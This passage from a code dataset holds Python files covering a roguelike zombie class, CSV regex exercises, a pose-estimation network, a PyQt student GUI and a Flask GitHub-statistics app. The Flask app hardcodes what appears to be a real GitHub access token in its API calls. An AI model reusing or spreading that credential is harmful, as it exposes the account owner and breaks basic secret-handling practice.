scenarios_info]\n caseconfig['scenario_store'] = [i[1] for i in scenarios_info]\n\n sql = ''' SELECT * FROM methods WHERE case_id = ?'''\n methods_table = select_from_table_where(sql, case_id)\n methods = []\n for method in methods_table:\n if method[2] == 1: methods.append('transfer_entropy_kernel')\n if method[3] == 1: methods.append('transfer_entropy_kraskov')\n if method[4] == 1: methods.append('cross_correlation')\n if method[5] == 1: methods.append('partial_correlation')\n caseconfig['weight_methods'] = [i for i in methods]\n\n sql = ''' SELECT * FROM rank_methods WHERE case_id = ?'''\n rank_methods_table = select_from_table_where(sql, case_id)\n rank_methods = []\n for method in rank_methods_table:\n if method[2] == 1: rank_methods.append('eigenvector')\n if method[3] == 1: rank_methods.append('katz')\n if method[4] == 1: rank_methods.append('pagerank')\n caseconfig['rank_methods'] = [i for i in 
rank_methods]\n\n for scenario in scenarios_info:\n scenario_id = scenario[0]\n scenario_name = scenario[1]\n sql = ''' SELECT * FROM noderank WHERE scenario_id = ?'''\n noderank_table = select_from_table_where(sql, scenario_id)\n caseconfig[scenario_name] = {\n 'settings': noderank_table[0][2],\n 'connections': noderank_table[0][3],\n 'm': noderank_table[0][4],\n 'boxindex_type': noderank_table[0][5],\n 'boxindex_start': noderank_table[0][6],\n 'boxindex_end': noderank_table[0][7],\n 'use_connections': bool(noderank_table[0][8]),\n 'use_bias': bool(noderank_table[0][9]),\n 'dummies': bool(noderank_table[0][10])\n }\n return caseconfig","sub_path":"db_functions.py","file_name":"db_functions.py","file_ext":"py","file_size_in_byte":10149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"297476127","text":"from enemy import *\nimport random\nimport Message\n\nclass Zombie(Enemy):\n\tdef __init__(self,messageLog, currentMap = None):\n\t\tsuper().__init__(messageLog, currentMap)\n\t\tself.name = \"Zombie\"\n\t\tself.levelMod = random.choice([-2,-1,0,0,0,0,0,1,1,2])\n\t\tself.level = currentMap.level + self.levelMod\t\t\t\t\n\t\tself.character = \"z\"\t\t\n\t\tself.speed = 7\n\t\tself.hp = self.maxhp = round(4 * (max(1,self.level - 4) ** 0.4))\n\t\tself.baseDamage = round(6 * (max(1,self.level - 4) ** 0.2))\n\t\tself.baseToHit = round(4 * (max(1,self.level - 4) ** 0.2))\n\t\tself.baseToDefend = 1\n\t\tself.color = random.choice([\"silver\", \"maroon\", \"teal\"])\t\t\t\t\n\t\tself.chartype = \"Zombie\"\n\t\tself.team = 3\n\t\n\tdef ToDefend(self):\n\t\t# Differnt so doesn't get zombie DV drain\n\t\ttoDefend = self.baseToDefend +\\\n\t\t\t((self.leftHandEquipped.ToDefend + self.ToDefMod(self.leftHandEquipped.ItemClass)) if self.leftHandEquipped != None else 0) +\\\n\t\t\t((self.rightHandEquipped.ToDefend + self.ToDefMod(self.rightHandEquipped.ItemClass)) if self.rightHandEquipped !=None else 0) +\\\n\t\t\t((self.ToDefMod(7) if (self.leftHandEquipped != None and self.leftHandEquipped.ItemClass < 6 and self.rightHandEquipped != None and self.rightHandEquipped.ItemClass < 6) else 0)) +\\\n\t\t\t((self.ToDefMod(0) if (self.leftHandEquipped == None) and (self.rightHandEquipped == None) else 0))\n\t\t\n\t\treturn toDefend\n\t\n\tdef danger(self):\n\t\treturn (5 + self.levelMod/2)\n\t\n\tdef update(self):\t\t\t\n\t\tsuper().update()\n\t\ttry:\n\t\t\tnearestEnemy = min([i for i in self.currentMap.characters if i != self and i.team != self.team],\n\t\t\t\tkey = lambda i: abs(self.x - i.x) + abs(self.y - i.y))\n\t\t\tdx = 0 if nearestEnemy.x == self.x else (-1 if nearestEnemy.x < self.x else 1)\n\t\t\tdy = 0 if nearestEnemy.y == self.y else (-1 if nearestEnemy.y < self.y else 1)\n\t\t\tmonsterInSquare = [i for i in self.currentMap.characters if (i.x == self.x+dx) and (i.y == self.y+dy) and (i.team != self.team)]\n\t\t\tif len(monsterInSquare) > 0:\n\t\t\t\tself.tryMove(self.x + dx, self.y + dy)\n\t\t\telif self.currentMap.Walkable((self.x + dx, self.y + dy)):\n\t\t\t\tself.tryMove(self.x + dx, self.y + dy)\n\t\t\telif self.currentMap.Walkable((self.x + dx, self.y)) and dx != 0:\n\t\t\t\tself.tryMove(self.x + dx, self.y)\n\t\t\telif self.currentMap.Walkable((self.x, self.y+dy)) and dy != 0:\n\t\t\t\tself.tryMove(self.x, self.y + dy)\n\t\t\telse:\n\t\t\t\tself.Wait()\n\t\t\t\n\t\t\t\n\t\texcept ValueError:\n\t\t\tself.Wait()\n\t\t\treturn\n\t\t\n\t\t\n\t\t# Update nearby DVs\n\t\tfor j in [i for i in self.currentMap.characters if i.chartype != \"Zombie\" 
and i.chartype != \"Necromancer\"]:\n\t\t\t# Check for adjacent zombies\n\t\t\tzombies = [i for i in self.currentMap.characters if (i.chartype == \"Zombie\")\\\n\t\t\t\tand (abs(i.x - j.x) < 2)\\\n\t\t\t\tand (abs(i.y - j.y) < 2)]\n\t\t\tif len(zombies) > 0:\n\t\t\t\tclosedCount = len(zombies)\n\t\t\t\tfor x in range(j.x-1,j.x+2):\n\t\t\t\t\tfor y in range(j.y-1,j.y+2):\n\t\t\t\t\t\tif self.currentMap.Map[x][y].walkable == False:\n\t\t\t\t\t\t\tclosedCount += 1\n\t\t\telse:\n\t\t\t\tclosedCount = 0\n\t\t\tj.ZombieMod = closedCount\n\t\t\tif j.ZombieMod > 4 and j.ZombieMod < 8:\n\t\t\t\tself.messageLog.append(Message.Message(j.name + \" is almost surrounded by the undead!\"))\n\t\t\tif j.ZombieMod == 8:\n\t\t\t\tself.messageLog.append(Message.Message(j.name + \" has been overrun by the undead!\"))","sub_path":"src/Zombie.py","file_name":"Zombie.py","file_ext":"py","file_size_in_byte":3196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"255801514","text":"from scraping import extract_review\nimport csv\n\nstations_f = open('station.csv', 'r', encoding='utf-8-sig')\nstations_list = csv.reader(stations_f)\nrestaurant_dic = {}\nreview_f = open(\"review.csv\", \"w\")\nreview_f.write(\"restaurant name\" + ',' + \"address\" + ',' + \"rating\" + ',' + \"number of likes\" + ',' + \"features\" + ',' + \"review\" + \"\\n\")\nfor station in stations_list:\n    print(station[0] + \" start\")\n    extract_review(station[0], restaurant_dic, review_f)\n    print(station[0] + \" done\")\n\nstations_f.close()\nreview_f.close()\n\n\n# Read the csv file that stores the name of every Seoul subway station and collect the stations in a list.\n# Loop over the list so that every station gets searched.\n# Pass each station to extract_review; inside that function, chromeDriver searches for the station in the browser and scrapes the reviews of the restaurants it finds.\n# Note that the chromeDriver path must be configured correctly. (Download the chromeDriver build that matches the version of Chrome installed on the machine.)","sub_path":"scraping/regoion.py","file_name":"regoion.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"394125491","text":"import re\n\ndef read_csv(file):\n\tf = open(file, \"r\")\n\tfirst_line = f.readline()\n\tfirst_line = re.sub('\\n', '', first_line)\n\theaders = re.split(',\\s?', first_line)\n\tdata = []\n\tfor line in f:\n\t\ttext_line = re.sub('\\n', '', line)\n\t\trow = re.split(',\\s?', text_line)\n\t\tdata.append(row)\n\tf.close()\n\treturn (headers, data)\n\n\n# Q1\ndef get_degree_freq(data, headers):\n\tfield_num = headers.index(\"degree\")\n\tfreqs = {}\n\tfor row in data:\n\t\tvalue = re.sub('[.]', '', row[field_num])\n\t\tvalues = value.split()\n\t\tif len(values) > 1:\n\t\t\tfor val in values:\n\t\t\t\tif val not in freqs:\n\t\t\t\t\tfreqs[val] = 1\n\t\t\t\telse:\n\t\t\t\t\tfreqs[val] += 1\n\t\telse:\n\t\t\tif value not in freqs:\n\t\t\t\tfreqs[value] = 1\n\t\t\telse:\n\t\t\t\tfreqs[value] += 1\n\n\treturn freqs\n\n\n# Q2\ndef get_title_freq(data, headers):\n\tfield_num = headers.index(\"title\")\n\tfreqs = {}\n\tfor row in data:\n\t\tvalue = re.sub('is\\s', 'of ', row[field_num])\n\t\tvalues = value.split()\n\t\tif value not in freqs:\n\t\t\tfreqs[value] = 1\n\t\telse:\n\t\t\tfreqs[value] += 1\n\n\treturn freqs\n\n\n# Q3\ndef get_email_list(data, headers):\n\tfield_num = headers.index(\"email\")\n\temail_list = [x[field_num] for x in data]\n\treturn email_list\n\n\n# Q4\ndef get_unique_domains(list):\n\treturn set([ re.sub('.*@', '', x) for x in list if '@' in x ])\n\n\n# Used to print markdown tables for Q1 and Q2\ndef print_markdown(col):\n\ttotal = 0\n\tprint('| Title | Frequency 
|')\n\tprint('| ----- | --------- |')\n\n\tfor d in col:\n\t\tprint(\"| \" + str(repr(d)) + \" | \" + str(col.get(d)) + \" |\")\n\t\ttotal += col.get(d)\n\n\tprint(\"| TOTAL | \" + str(total) + \" |\")\n\n\n#########################################\n\nf = \"./faculty.csv\"\ndata_and_headers = read_csv(f)\nheaders = data_and_headers[0]\ndata = data_and_headers[1]\n\ndegrees = get_degree_freq(data, headers)\ntitles = get_title_freq(data, headers)\nemails = get_email_list(data, headers)\nunique_domains = get_unique_domains(emails)\n\n#print_markdown(degrees) #Q1 answer \n#print_markdown(titles) #Q2 answer\n#print(emails) #Q3 answer\n#print(unique_domains) #Q4 answer","sub_path":"python/advanced_python_regex.py","file_name":"advanced_python_regex.py","file_ext":"py","file_size_in_byte":1971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"180320890","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass Bottleneck(nn.Module):\n expansion = 4\n\n def __init__(self, in_planes, planes, out_planes=0, stride=1):\n super(Bottleneck, self).__init__()\n out_planes = self.expansion*planes if out_planes == 0 else out_planes\n self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1, bias=False)\n self.bn1 = nn.BatchNorm2d(planes)\n self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)\n self.bn2 = nn.BatchNorm2d(planes)\n self.conv3 = nn.Conv2d(planes, out_planes, kernel_size=1, bias=False)\n self.bn3 = nn.BatchNorm2d(out_planes)\n\n self.downsample = nn.Sequential()\n if stride != 1 or in_planes != out_planes:\n self.downsample = nn.Sequential(\n nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False),\n nn.BatchNorm2d(out_planes)\n )\n\n def forward(self, x):\n out = F.relu(self.bn1(self.conv1(x)))\n out = F.relu(self.bn2(self.conv2(out)))\n out = self.bn3(self.conv3(out))\n out += self.downsample(x)\n out = F.relu(out)\n return out\n\n\nclass CPNet(nn.Module):\n def __init__(self, num_blocks, num_keypoints=17):\n super(CPNet, self).__init__()\n self.in_planes = 64\n self.num_keypoints = num_keypoints\n\n self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3, bias=False)\n self.bn1 = nn.BatchNorm2d(64)\n self.layer1 = self._make_layer( 64, num_blocks[0], stride=1)\n self.layer2 = self._make_layer(128, num_blocks[1], stride=2)\n self.layer3 = self._make_layer(256, num_blocks[2], stride=2)\n self.layer4 = self._make_layer(512, num_blocks[3], stride=2)\n\n self.lateral1 = nn.Conv2d(2048, 256, kernel_size=1, stride=1, padding=0)\n self.lateral2 = nn.Conv2d(1024, 256, kernel_size=1, stride=1, padding=0)\n self.lateral3 = nn.Conv2d( 512, 256, kernel_size=1, stride=1, padding=0)\n self.lateral4 = nn.Conv2d( 256, 256, kernel_size=1, stride=1, padding=0)\n\n self.smooth1 = nn.Conv2d(256, 256, kernel_size=1, stride=1, padding=0)\n self.smooth2 = nn.Conv2d(256, 256, kernel_size=1, stride=1, padding=0)\n self.smooth3 = nn.Conv2d(256, 256, kernel_size=1, stride=1, padding=0)\n\n self.global1 = self._make_global(scale_factor=8)\n self.global2 = self._make_global(scale_factor=4)\n self.global3 = self._make_global(scale_factor=2)\n self.global4 = self._make_global(scale_factor=1)\n\n self.refine1 = self._make_refine(num_blocks=3, scale_factor=8)\n self.refine2 = self._make_refine(num_blocks=2, scale_factor=4)\n self.refine3 = self._make_refine(num_blocks=1, scale_factor=2)\n self.refine4 = nn.Sequential(\n Bottleneck(4*256, 128, 256),\n nn.Conv2d(256, 
num_keypoints, kernel_size=3, stride=1, padding=1),\n )\n\n def _make_layer(self, planes, num_blocks, stride):\n strides = [stride] + [1]*(num_blocks-1)\n layers = []\n for stride in strides:\n layers.append(Bottleneck(self.in_planes, planes, stride=stride))\n self.in_planes = planes * Bottleneck.expansion\n return nn.Sequential(*layers)\n\n def _make_global(self, scale_factor):\n return nn.Sequential(\n nn.Conv2d(256, 256, kernel_size=1, stride=1, padding=0),\n nn.ReLU(True),\n nn.Conv2d(256, self.num_keypoints, kernel_size=3, stride=1, padding=1),\n nn.Upsample(scale_factor=scale_factor, mode='bilinear', align_corners=False),\n )\n\n def _make_refine(self, num_blocks, scale_factor):\n layers = []\n for i in range(num_blocks):\n layers.append(Bottleneck(256,128,256))\n layers.append(nn.Upsample(scale_factor=scale_factor, mode='bilinear', align_corners=False))\n return nn.Sequential(*layers)\n\n def _upsample_smooth_add(self, x, smooth, y):\n up = F.upsample(x, scale_factor=2, mode='bilinear', align_corners=False)\n return smooth(up) + F.relu(y)\n\n def forward(self, x):\n # Top-down\n c1 = F.relu(self.bn1(self.conv1(x)))\n c1 = F.max_pool2d(c1, kernel_size=3, stride=2, padding=1)\n c2 = self.layer1(c1)\n c3 = self.layer2(c2)\n c4 = self.layer3(c3)\n c5 = self.layer4(c4)\n # Bottom-up\n p5 = self.lateral1(c5)\n p4 = self._upsample_smooth_add(p5, self.smooth1, self.lateral2(c4))\n p3 = self._upsample_smooth_add(p4, self.smooth2, self.lateral3(c3))\n p2 = self._upsample_smooth_add(p3, self.smooth3, self.lateral4(c2))\n # GlobalNet\n g5 = self.global1(p5)\n g4 = self.global2(p4)\n g3 = self.global3(p3)\n g2 = self.global4(p2)\n # RefineNet\n r5 = self.refine1(p5)\n r4 = self.refine2(p4)\n r3 = self.refine3(p3)\n r2 = p2\n r = torch.cat([r5,r4,r3,r2], 1)\n r = self.refine4(r)\n return g5, g4, g3, g2, r\n\n\ndef CPNet50():\n return CPNet([3,4,6,3])\n\ndef CPNet101():\n return CPNet([3,4,23,3])\n\ndef CPNet152():\n return CPNet([3,8,36,3])\n\n\ndef test():\n net = CPNet50()\n ys = net(torch.randn(1,3,192,256))\n for y in ys:\n print(y.size())\n\ntest()\n","sub_path":"net.py","file_name":"net.py","file_ext":"py","file_size_in_byte":5312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"573094327","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Nov 13 18:52:22 2019\n\n@author: Work\n\"\"\"\nimport glob\nimport pandas as pd\nimport cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom imutils.object_detection import non_max_suppression\n# from timeit import default_timer as timer\n\n\nmodel_code=\"model\"\next = \".jpg\"\ndf_train = pd.read_csv(\"dataset/\"+model_code+\"/train_labels.csv\")\n\n\nfile_list_test = sorted(glob.glob(\"dataset/\"+model_code+\"/train/*\"+ext))\nfor path in file_list_test:\n print(path)\n name = path.split(\"\\\\\")[1]\n \n \n\n img = cv2.imread(path)\n results = df_train.loc[df_train[\"filename\"]==str(name),[\"xmin\", \"ymin\", \"xmax\", \"ymax\"]].values.tolist()\n\n \n rect = np.array([[x1,y1,x2,y2] for (x1,y1,x2,y2) in results])\n pick = non_max_suppression(rect, probs = None, overlapThresh = 0.2)\n \n \n for x1,y1,x2,y2 in pick:\n cv2.rectangle(img, (x1, y1), (x2, y2), (0,0,255), 2)\n\n\n # cv named Window\n img = cv2.resize(img, (600,353))\n cv2.imshow(\"results\", img) # cv2.resize(img, (448,448)))\n print(\"results\", rect)\n k = cv2.waitKey(30) & 0xff\n if k ==27:\n cv2.waitKey(0)\n break\n if (len(results)>0):\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n 
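# non_max_suppression above merges overlapping ground-truth boxes\n    # (overlapThresh=0.2) before drawing, so heavily overlapping labels are\n    # rendered as a single rectangle; raising overlapThresh keeps more boxes.\n    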
\n","sub_path":"Python/check_bboxes.py","file_name":"check_bboxes.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"204870571","text":"import tensorflow as tf\nimport ujson as json\nimport numpy as np\nfrom tqdm import tqdm\nfrom collections import Counter\nfrom util import get_batch, get_feeddict,get_pretrain_batch\nimport os\nimport constant\n\nfrom loader import read_glove, get_counter, token2id, read_data,read_pretrain\n\ntqdm.monitor_interval = 0\nnp.set_printoptions(threshold=np.nan)\n\n\ndef read(config):\n counter = get_counter(config.train_file)\n if os.path.exists(config.emb_dict):\n with open(config.emb_dict, \"r\") as fh:\n emb_dict = json.load(fh)\n else:\n emb_dict = read_glove(config.glove_word_file, counter, config.glove_word_size, config.glove_dim)\n with open(config.emb_dict, \"w\") as fh:\n json.dump(emb_dict, fh)\n word2idx_dict, fixed_emb, traiable_emb = token2id(config, counter, emb_dict)\n\n train_data = read_data(config.train_file)\n dev_data = read_data(config.dev_file)\n test_data = read_data(config.test_file)\n pretrain_data = read_pretrain(config)\n pretrain_data2 = read_pretrain(config,2)\n return word2idx_dict, fixed_emb, traiable_emb, train_data, dev_data, test_data,pretrain_data,pretrain_data2\n\ndef log(config, data, pretrain_data,word2idx_dict, model, sess,rels):\n global_step = sess.run(model.global_step) + 1\n sim_out = 0\n assert len(data) == 1\n for batch,_ in zip(get_batch(config, data, word2idx_dict,shuffle=False),get_pretrain_batch(config,pretrain_data,word2idx_dict,pretrain=False)):\n sim_out = sess.run(model.sim,feed_dict=get_feeddict(model, batch,_, is_train=False))\n sim_out = list(sim_out[0])\n assert len(sim_out)==rels.shape[0]\n sort_idx = np.argsort(np.array(sim_out))[-3:]\n if sim_out[sort_idx[-1]]<0.5:\n return {\"Can't decide\":1}\n else:\n return {constant.ID_TO_LABEL[np.argmax(rels[sort_idx[-1]])]:float(sim_out[sort_idx[-1]]),\n constant.ID_TO_LABEL[np.argmax(rels[sort_idx[-2]])]:float(sim_out[sort_idx[-2]]),\n constant.ID_TO_LABEL[np.argmax(rels[sort_idx[-3]])]:float(sim_out[sort_idx[-3]])}\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"486657986","text":"from flask import Flask, redirect, request, render_template\nimport requests\nimport json\nimport random\nimport dateutil.parser\nimport datetime\n\n\nlabels = []\nvalues = []\n\ndates = []\ncommits= []\n\ncolors = [\n \"#F7464A\", \"#46BFBD\", \"#FDB45C\", \"#FEDCBA\",\n \"#ABCDEF\", \"#DDDDDD\", \"#ABCABC\", \"#4169E1\",\n \"#C71585\", \"#FF4500\", \"#FEDCBA\", \"#46BFBD\"]\n\n\n\napp= Flask(__name__)\n@app.route('/')\ndef home():\n return render_template('homePage.html')\n\n\n@app.route('/', methods=['POST'])\ndef my_form_post():\n text = request.form.get('username')\n\n #GETTING USER PROFILE INFO\n user_request = requests.get('https://api.github.com/users/'+text, auth=('rowlanja', '72f894a6faa4ee1fd6cee8b51bb722d6587a0601')).json()\n name = user_request[\"login\"]\n location = user_request[\"location\"]\n company = user_request[\"company\"]\n hireable = user_request[\"hireable\"]\n email = user_request[\"email\"]\n bio = user_request[\"bio\"]\n twitter_username = user_request[\"twitter_username\"]\n followers = user_request[\"followers\"]\n following = user_request[\"following\"]\n created_at = user_request[\"created_at\"]\n created_at = 
dateutil.parser.parse(created_at)\n created_at = created_at.date().strftime(\"%d/%m/%Y\")\n blog = user_request[\"blog\"]\n\n #GETTING Programming LANGUAGES USED INFO\n #PUTS LANGUAGES IN LABELS LIST\n #PUT LANGUAGE USED COUNT IN VALUES LIST\n user_request = requests.get('https://api.github.com/users/'+text+\"/repos\", auth=('rowlanja', '72f894a6faa4ee1fd6cee8b51bb722d6587a0601')).json()\n languageDict = {}\n for val in user_request :\n if(val[\"language\"] != None) : \n languageDict[val[\"language\"]] = languageDict.get(val[\"language\"], 0) + 1\n random_number = random.randint(0,16777215)\n hex_number = str(hex(random_number))\n hex_number ='#'+ hex_number[2:]\n colors.append(hex_number)\n labels = languageDict.keys()\n values = languageDict.values()\n\n #GETTING COMMIT HISTORY\n #PUTS DATES IN DATES LIST\n #PUT COMMIT COUNT IN COMMITS LIST\n user_request = requests.get('https://api.github.com/users/'+text+\"/events\", auth=('rowlanja', '72f894a6faa4ee1fd6cee8b51bb722d6587a0601')).json()\n for entry in user_request :\n x = entry[\"payload\"]\n if \"commits\" in x :\n size = len(x[\"commits\"])\n yourdate = dateutil.parser.parse(entry[\"created_at\"])\n yourdate = yourdate.date().strftime(\"%d/%m/%Y\")\n dates.append(yourdate)\n commits.append(size)\n maxCommitCount = max(commits)\n\n\n repoLanguages=getLanguages(text)\n\n repoLanguages = sorted(repoLanguages.items(), key= lambda x: len(x[1]))\n repoLanguages = dict(repoLanguages)\n print(\"sorted\", repoLanguages)\n #print(getLanguages(text))\n return render_template('user.html',\n name = name, location = location,\n company = company, hireable = hireable,\n email = email, bio = bio,\n twitter_username = twitter_username, followers = followers,\n following = following, created_at = created_at,\n blog = blog, title='Bitcoin Monthly Price in USD', max=1, set=zip( values, labels, colors),\n labelsLine=dates, valuesLine=commits, \n followersList=getFollowers(text), repoLanguages=repoLanguages\n )\n\n#GETS THE LIST OF FOLLOWERS OF A USER\ndef getFollowers(userName):\n user_request = requests.get('https://api.github.com/users/'+userName+\"/followers\", auth=('rowlanja', '72f894a6faa4ee1fd6cee8b51bb722d6587a0601')).json()\n followers = {}\n for user in user_request : \n followers[user[\"login\"]]= user[\"html_url\"]\n \n return followers\n\n# GETS THE REPOS % LANGUAGES USED\n# THE IF STATEMENT CHECK WHETHER THE LANGUAGE KEY IS SET TO A VALUE IN THE REPOS API RESPONSE\n# IF THE REPO HAS MULTIPLE LANGUAGES THIS VLAUE IS NULL AND THE LANGUAGES ARE STORED AT THE /REPO/LANGUAGES API ENPOINT\n# IF THE REPO HAS A SINGLE VALUE THEN THE LANGUAGE WILL BE DIRECTLY STORED ON THE /REPOS API ENPOINT\ndef getLanguages(userName):\n user_request = requests.get('https://api.github.com/users/'+userName+\"/repos\", auth=('rowlanja', '72f894a6faa4ee1fd6cee8b51bb722d6587a0601')).json()\n repoLanguages = {}\n for repo in user_request :\n if repo[\"language\"] :\n language_request = requests.get('https://api.github.com/repos/'+repo[\"full_name\"]+\"/languages\", auth=('rowlanja', '72f894a6faa4ee1fd6cee8b51bb722d6587a0601')).json()\n repoLanguages[repo[\"name\"]] = language_request\n elif repo[\"language\"] and not(repo[\"language\"] is None):\n repoLanguages[repo[\"name\"]] = repo[\"language\"]\n return repoLanguages\n\n@app.route('/linechart')\ndef line():\n line_labels=labels\n line_values=values\n return render_template('linechart.html', title='Bitcoin Monthly Price in USD', max=17000, labels=line_labels, values=line_values)\n\nif __name__ == '__main__':\n 
app.run(threaded=True, port=5000)","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"582171734","text":"import math\n\n# Explicitly adjusted hyperparameters\nconv_out_channels = 8\nconv_kernel_size = 5\nconv_stride = 1\n\npool_kernel_size = 3\npool_stride = 3\n\nlin_out_features = 32\n\nembedding_length = 8\n\n# Implicitly adjusted hyperparameters\nlin_in_features = int(math.pow(((26 - conv_kernel_size - pool_kernel_size) \\\n /3 + 1), 2)) * conv_out_channels\n\nhead_in_features = lin_out_features + embedding_length\n","sub_path":"nets/indigooryx/hyperparameters.py","file_name":"hyperparameters.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"417863815","text":"#!/usr/bin/env python3\n#By Dr.ZCH\n\nimport sys\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtGui import *\nimport sql\n\nclass Table(QStandardItemModel):\n def __init__(self,name):\n super(Table,self).__init__()\n self.setHorizontalHeaderLabels(sql.header(name))\n def put(self,content): \n for row in content:\n items=[]\n for i in row:\n items.append(QStandardItem(str(i)))\n self.appendRow(items)\n \nclass Window(QWidget):\n def button1(self):\n self.TableB.clear()\n self.TableB=Table('s')\n self.TableB.put(sql.s(self.EditB1.text()))\n self.tableB.setModel(self.TableB)\n self.B3.setTitle('学号为'+self.EditB1.text()+'的基本信息')\n self.show()\n\n def button2(self):\n self.TableB.clear()\n self.TableB=Table('c')\n self.TableB.put(sql.c(self.EditB1.text()))\n self.tableB.setModel(self.TableB)\n self.B3.setTitle('学号为'+self.EditB1.text()+'的已选课程')\n self.show()\n def button3(self):\n self.TableB.clear()\n self.TableB=Table('sc')\n self.TableB.put(sql.sc(self.EditB1.text()))\n self.tableB.setModel(self.TableB)\n self.B3.setTitle('学号为'+self.EditB1.text()+'的课程成绩')\n def __init__(self):\n super(Window, self).__init__()\n\n self.setWindowTitle('学生管理系统')\n self.setGeometry(200,200,800,400)\n\n self.tableA = QTableView()\n self.TableA = Table('s')\n self.TableA.put(sql.content('s'))\n\n self.tableA.setModel(self.TableA)\n self.tableA.verticalHeader().hide()\n self.tableA.horizontalHeader().setStretchLastSection(True)\n\n self.A = QGroupBox()\n self.A.setTitle('学生名单')\n self.A.setLayout(QVBoxLayout())\n self.A.layout().addWidget(self.tableA) \n self.A.setFixedSize(400,300)\n\n self.LabelB1=QLabel('请输入学号:',self)\n self.EditB1=QLineEdit()\n self.Button1=QPushButton('查询基本信息',self)\n self.Button1.clicked.connect(self.button1)\n self.Button2=QPushButton('查询已选课程',self)\n self.Button2.clicked.connect(self.button2)\n self.Button3=QPushButton('查询课程成绩',self)\n self.Button3.clicked.connect(self.button3)\n\n self.TableB=Table('s')\n self.tableB=QTableView()\n self.tableB.setModel(self.TableB)\n self.tableB.verticalHeader().hide()\n self.tableB.horizontalHeader().setStretchLastSection(True)\n\n self.B3=QGroupBox()\n self.B3.setLayout(QVBoxLayout())\n self.B3.setFixedSize(400,250)\n self.B3.layout().addWidget(self.tableB)\n \n self.B1=QHBoxLayout()\n self.B2=QHBoxLayout()\n self.B1.addWidget(self.LabelB1)\n self.B1.addWidget(self.EditB1)\n self.B2.addWidget(self.Button1)\n self.B2.addWidget(self.Button2)\n self.B2.addWidget(self.Button3)\n\n self.B = QGroupBox()\n self.B.setTitle('学生信息')\n self.B.setLayout(QVBoxLayout())\n self.B.layout().addLayout(self.B1)\n self.B.layout().addLayout(self.B2)\n 
self.B.layout().addWidget(self.B3)\n \n self.mainLayout = QHBoxLayout()\n self.mainLayout.addWidget(self.A)\n self.mainLayout.addWidget(self.B)\n\n self.setLayout(self.mainLayout)\n self.show()\n\n\nif __name__=='__main__':\n app=QApplication(sys.argv)\n w=Window()\n sys.exit(app.exec_())\n","sub_path":"gui_sql/student.py","file_name":"student.py","file_ext":"py","file_size_in_byte":3535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"287849543","text":"#very nice to read way\n\ndef iq_test(numbers):\n list_of_numbers = [int(i) for i in numbers.split(' ')]\n first_three = list_of_numbers[:3]\n even, odd = 0, 0\n for i in first_three:\n if i % 2:\n odd += 1\n else:\n even += 1\n\n if odd > even:\n for number in list_of_numbers:\n if number % 2 == 0:\n return list_of_numbers.index(number) + 1\n else:\n for number in list_of_numbers:\n if number % 2 == 1:\n return list_of_numbers.index(number) + 1\n\n#cool more concise way\ndef iq_test(numbers):\n parity_list = [int(i) % 2 for i in numbers.split(' ')]\n return parity_list.index(0) + 1 if parity_list.count(1) > 1 else parity_list.index(1) + 1\n#trashy 1 liner\ndef iq_test(numbers):\n return [int(i) % 2 for i in numbers.split(' ')].index(0) + 1 if [int(i) % 2 for i in numbers.split(' ')].count(1) > 1 else [int(i) % 2 for i in numbers.split(' ')].index(1) + 1\n\nprint(iq_test(\"2 4 7 8 10\"),3)\nprint(iq_test(\"1 2 2\"), 1)\n","sub_path":"6 kyu/18_10_02_iq_test.py","file_name":"18_10_02_iq_test.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"208324108","text":"# coding=utf-8\n\n\nclass Container:\n\n def __init__(self):\n self.message = self.parent = None\n self.children = []\n\n\n def remove_child(self, child):\n self.children.remove(child)\n # Remove the child, and remove the parent-link\n child.parent = None\n\n def add_child(self, child):\n # If child has a parent remove! the new one is self! Remove also the child from its parent to destroy\n # all the previous links.\n if child.parent:\n child.parent.remove_child(child)\n child.parent = self\n self.children.append(child)\n\n def introduce_loop(self, rfr_container):\n\n # Check all children of the container, and recursively all sub-children.\n container_list = []\n container_list.append(self)\n visited = []\n\n while len(container_list) > 0:\n\n extracted_container = container_list.pop()\n\n if extracted_container is rfr_container:\n return True\n\n else:\n visited.append(extracted_container)\n for child in extracted_container.children:\n if child not in visited:\n container_list.append(child)\n\n return False\n","sub_path":"script_mail_analysis/container.py","file_name":"container.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"617353850","text":"#!/usr/bin/env python3\n\n# Copyright 2017 Brocade Communications Systems, Inc. 
